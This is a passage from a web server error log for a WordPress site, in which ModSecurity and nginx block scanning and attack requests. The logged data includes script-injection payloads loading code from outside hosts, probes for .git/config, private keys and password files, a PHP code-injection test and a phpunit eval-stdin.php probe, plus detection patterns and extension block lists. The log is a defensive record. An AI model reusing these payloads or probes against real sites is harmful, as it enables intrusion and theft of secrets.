.printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Zva1nHS9QK3Qt3_keJRNswAAAEk"] [Fri Sep 27 08:39:40.247084 2024] [:error] [pid 7746:tid 140640758855424] [client 213.232.87.228:39918] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "Zva1nKhNYU8L5pHE_yrU-gAAAIE"] 2024/09/27 08:39:40 [error] 7604#7604: *86943 access forbidden by rule, client: 213.232.87.228, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2024/09/27 08:39:40 [error] 7604#7604: *86942 access forbidden by rule, client: 213.232.87.228, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Fri Sep 27 08:39:40.251423 2024] [:error] [pid 7746:tid 140640549549824] [client 213.232.87.228:39922] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zva1nKhNYU8L5pHE_yrU-wAAAJE"] [Fri Sep 27 08:39:40.252638 2024] [:error] [pid 7746:tid 140640549549824] [client 213.232.87.228:39926] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zva1nKhNYU8L5pHE_yrU_QAAAJE"] [Fri Sep 27 08:39:40.289638 2024] [:error] [pid 7745:tid 140640599906048] [client 213.232.87.228:39914] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "Zva1nHS9QK3Qt3_keJRNuAAAAEs"] [Fri Sep 27 08:39:40.407780 2024] [authz_host:error] [pid 7745:tid 140640549549824] [client 213.232.87.228:39908] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Fri Sep 27 08:39:40.407829 2024] [authz_core:error] [pid 7745:tid 140640549549824] [client 213.232.87.228:39908] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Sep 27 22:17:26.234215 2024] [:error] [pid 8300:tid 140640599906048] [client 179.43.191.19:60830] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zvd1RuCyRkyzYVtCjuJ_VwAAAMs"], referer: https://investigacionperu.com 2024/09/28 11:01:32 [error] 4980#4980: *104737 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 28 12:29:02.323654 2024] [autoindex:error] [pid 5196:tid 139645820004096] [client 74.225.218.129:46180] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/09/28 13:54:01 [error] 4979#4979: *105965 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/28 15:52:43 [error] 4980#4980: *106660 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 28 16:04:41.885532 2024] [authz_core:error] [pid 4998:tid 139645769647872] [client 64.226.78.121:48716] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/28 16:04:46 [error] 4980#4980: *106825 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 28 16:46:04.790802 2024] [authz_core:error] [pid 4998:tid 139645769647872] [client 209.38.248.17:49594] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/28 16:46:09 [error] 4980#4980: *107315 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/28 18:43:58 [error] 4980#4980: *108428 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/28 20:14:22 [error] 4979#4979: *109150 access forbidden by rule, client: 195.178.110.21, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/28 20:46:44 [error] 4980#4980: *109413 access forbidden by rule, client: 195.178.110.21, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/29 00:51:53 [error] 4980#4980: *114183 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/29 01:22:28 [error] 4980#4980: *114463 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/29 01:38:25 [error] 4979#4979: *114587 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/29 02:39:09 [error] 4980#4980: *115427 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/29 02:57:28 [error] 4980#4980: *115544 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/29 11:25:57 [error] 1770#1770: *120107 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/29 13:42:35 [error] 1770#1770: *121228 access forbidden by rule, client: 195.178.110.21, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/29 14:22:14 [error] 1769#1769: *121605 access forbidden by rule, client: 195.178.110.21, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/29 14:32:40 [error] 1770#1770: *121660 access forbidden by rule, client: 195.178.110.21, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/29 17:30:24 [error] 1769#1769: *124351 access forbidden by rule, client: 44.213.76.51, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/29 18:46:13 [error] 1769#1769: *124716 access forbidden by rule, client: 35.183.145.61, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/29 20:27:15 [error] 1770#1770: *125843 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/30 03:15:22 [error] 31222#31222: *128893 access forbidden by rule, client: 195.178.110.21, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/30 09:25:44 [error] 19268#19268: *131621 access forbidden by rule, client: 35.183.145.61, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Sep 30 13:17:15.800793 2024] [authz_core:error] [pid 27673:tid 139709263091456] [client 206.189.2.13:35586] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/30 13:17:21 [error] 27654#27654: *133683 access forbidden by rule, client: 206.189.2.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 30 15:27:26.670467 2024] [authz_core:error] [pid 28178:tid 139709137200896] [client 46.101.1.225:37202] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/30 15:27:31 [error] 27653#27653: *134624 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Sep 30 23:47:48.915035 2024] [autoindex:error] [pid 27673:tid 139709391677184] [client 157.173.114.0:45178] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Oct 01 06:54:19.902822 2024] [autoindex:error] [pid 2637:tid 140101422147328] [client 4.240.37.142:50230] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Oct 01 11:27:08.338034 2024] [autoindex:error] [pid 2638:tid 140101287864064] [client 66.70.181.5:54580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 01 11:27:09.609730 2024] [:error] [pid 2637:tid 140101552215808] [client 66.70.181.5:54584] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Tue Oct 01 16:53:39.233285 2024] [:error] [pid 2639:tid 140101422147328] [client 89.248.174.11:60418] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://go.kcloudinc.com/></script> found within ARGS:page: <script src=https://go.kcloudinc.com/></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZvxvY8df6HCTmfR898guGwAAAIc"], referer: http://investigacionperu.com [Wed Oct 02 00:21:05.334213 2024] [:error] [pid 2970:tid 140101543823104] [client 89.248.174.11:36688] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://go.kcloudinc.com/></script> found within ARGS:page: <script src=https://go.kcloudinc.com/></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZvzYQepPmv6ATGc2x6FUIgAAAME"], referer: https://investigacionperu.com [Wed Oct 02 11:33:03.574689 2024] [authz_core:error] [pid 30424:tid 140371124246272] [client 209.97.180.8:48752] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/02 11:33:07 [error] 29633#29633: *154998 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Oct 02 13:49:32.643152 2024] [:error] [pid 30424:tid 140371296777984] [client 45.227.254.34:51688] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "Zv2VvL1QBdQD2thJeox10gAAAME"] [Wed Oct 02 14:53:17.560508 2024] [authz_core:error] [pid 29676:tid 140371288385280] [client 209.97.180.8:53444] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/02 14:53:22 [error] 29632#29632: *157268 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 03 08:28:01.251296 2024] [:error] [pid 25119:tid 139666288240384] [client 179.43.191.19:49690] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zv6b4W_NJBq-Bub2MVMzPwAAAMw"], referer: https://investigacionperu.com [Thu Oct 03 14:53:38.518000 2024] [:error] [pid 25119:tid 139666346989312] [client 45.227.254.34:60272] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/core-engine/index.php"] [unique_id "Zv72Qm_NJBq-Bub2MVM3LQAAAMU"] [Thu Oct 03 19:10:21.052800 2024] [:error] [pid 25119:tid 139666330203904] [client 4.232.67.219:36778] [client 4.232.67.219] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "698"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Zv8ybW_NJBq-Bub2MVM4fQAAAMc"] [Fri Oct 04 03:27:54.639029 2024] [:error] [pid 24550:tid 139666237884160] [client 179.43.191.19:45062] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zv-nCuxN6b66yevc0tg44wAAABI"], referer: https://investigacionperu.com [Fri Oct 04 08:32:29.915413 2024] [autoindex:error] [pid 17114:tid 140493153339136] [client 193.34.213.181:48640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 12:01:36.813891 2024] [autoindex:error] [pid 16471:tid 140493195302656] [client 165.22.219.5:52844] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 04 13:30:46.329802 2024] [authz_core:error] [pid 16474:tid 140493044233984] [client 164.90.228.79:54050] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/04 13:30:51 [error] 16435#16435: *185820 access forbidden by rule, client: 164.90.228.79, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Oct 04 15:13:02.633843 2024] [authz_core:error] [pid 17114:tid 140493035841280] [client 207.154.197.113:56058] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/04 15:13:07 [error] 16435#16435: *186984 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/04 15:43:01 [error] 16434#16434: *187151 access forbidden by rule, client: 179.43.152.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Oct 04 17:26:11.717813 2024] [autoindex:error] [pid 17114:tid 140493144946432] [client 74.225.218.129:58648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 04 19:55:29.774880 2024] [autoindex:error] [pid 16474:tid 140493094590208] [client 203.55.81.229:33314] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 19:55:36.943179 2024] [:error] [pid 17114:tid 140493304219392] [client 203.55.81.229:33330] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 04 19:55:40.232909 2024] [autoindex:error] [pid 17114:tid 140493027448576] [client 203.55.81.229:33338] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 19:55:44.782267 2024] [autoindex:error] [pid 16474:tid 140493102982912] [client 203.55.81.229:33348] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 19:55:45.772548 2024] [autoindex:error] [pid 16474:tid 140493170124544] [client 203.55.81.229:33352] AH01276: Cannot serve directory 